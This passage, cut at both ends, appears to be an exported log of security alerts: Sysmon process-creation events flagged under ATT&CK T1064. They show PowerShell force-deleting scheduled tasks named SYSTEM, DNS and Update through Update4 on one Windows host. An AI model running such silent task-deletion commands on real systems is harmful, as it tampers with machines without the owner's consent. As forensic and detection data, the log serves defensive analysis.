+Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN SYSTEM /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:04.593133700Z"",""eventRecordID"":""2503"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:04.588\r\nProcessGuid: {df9fc3d3-b37c-5ecf-0000-0010f59d1e00}\r\nProcessId: 4716\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN SYSTEM /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: 
C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:04.588"",""processGuid"":""{df9fc3d3-b37c-5ecf-0000-0010f59d1e00}"",""processId"":""4716"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN SYSTEM /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:32.926",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:04.558 +ProcessGuid: {df9fc3d3-b37c-5ecf-0000-0010649c1e00} +ProcessId: 5556 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: 
""C:\Windows\system32\schtasks.exe"" /Delete /TN DNS /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN DNS /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:04.563295400Z"",""eventRecordID"":""2502"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:04.558\r\nProcessGuid: {df9fc3d3-b37c-5ecf-0000-0010649c1e00}\r\nProcessId: 5556\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN DNS /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: 
MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:04.558"",""processGuid"":""{df9fc3d3-b37c-5ecf-0000-0010649c1e00}"",""processId"":""5556"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN DNS /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:32.892",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:04.508 +ProcessGuid: {df9fc3d3-b37c-5ecf-0000-0010649a1e00} +ProcessId: 5312 +Image: C:\Windows\System32\schtasks.exe 
+FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN Update4 /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Update4 /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:04.523638200Z"",""eventRecordID"":""2501"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:04.508\r\nProcessGuid: {df9fc3d3-b37c-5ecf-0000-0010649a1e00}\r\nProcessId: 5312\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Update4 
/F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:04.508"",""processGuid"":""{df9fc3d3-b37c-5ecf-0000-0010649a1e00}"",""processId"":""5312"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN Update4 /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 
14:18:32.869",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:04.470 +ProcessGuid: {df9fc3d3-b37c-5ecf-0000-001092981e00} +ProcessId: 4588 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN Update3 /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Update3 /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:04.473694700Z"",""eventRecordID"":""2500"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:04.470\r\nProcessGuid: {df9fc3d3-b37c-5ecf-0000-001092981e00}\r\nProcessId: 4588\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 
(WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Update3 /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:04.470"",""processGuid"":""{df9fc3d3-b37c-5ecf-0000-001092981e00}"",""processId"":""4588"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN Update3 /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John 
Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:32.865",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:04.430 +ProcessGuid: {df9fc3d3-b37c-5ecf-0000-001085961e00} +ProcessId: 7592 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN Update2 /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Update2 
/F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:04.435516200Z"",""eventRecordID"":""2499"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:04.430\r\nProcessGuid: {df9fc3d3-b37c-5ecf-0000-001085961e00}\r\nProcessId: 7592\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Update2 /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:04.430"",""processGuid"":""{df9fc3d3-b37c-5ecf-0000-001085961e00}"",""processId"":""7592"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration 
Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN Update2 /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:32.822",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:04.398 +ProcessGuid: {df9fc3d3-b37c-5ecf-0000-0010ca941e00} +ProcessId: 7888 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN Update1 /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: 
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Update1 /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:04.401682200Z"",""eventRecordID"":""2498"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:04.398\r\nProcessGuid: {df9fc3d3-b37c-5ecf-0000-0010ca941e00}\r\nProcessId: 7888\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Update1 /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 
12:50:04.398"",""processGuid"":""{df9fc3d3-b37c-5ecf-0000-0010ca941e00}"",""processId"":""7888"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN Update1 /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:32.262",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:04.370 +ProcessGuid: {df9fc3d3-b37c-5ecf-0000-001009931e00} +ProcessId: 2596 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN Update /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: 
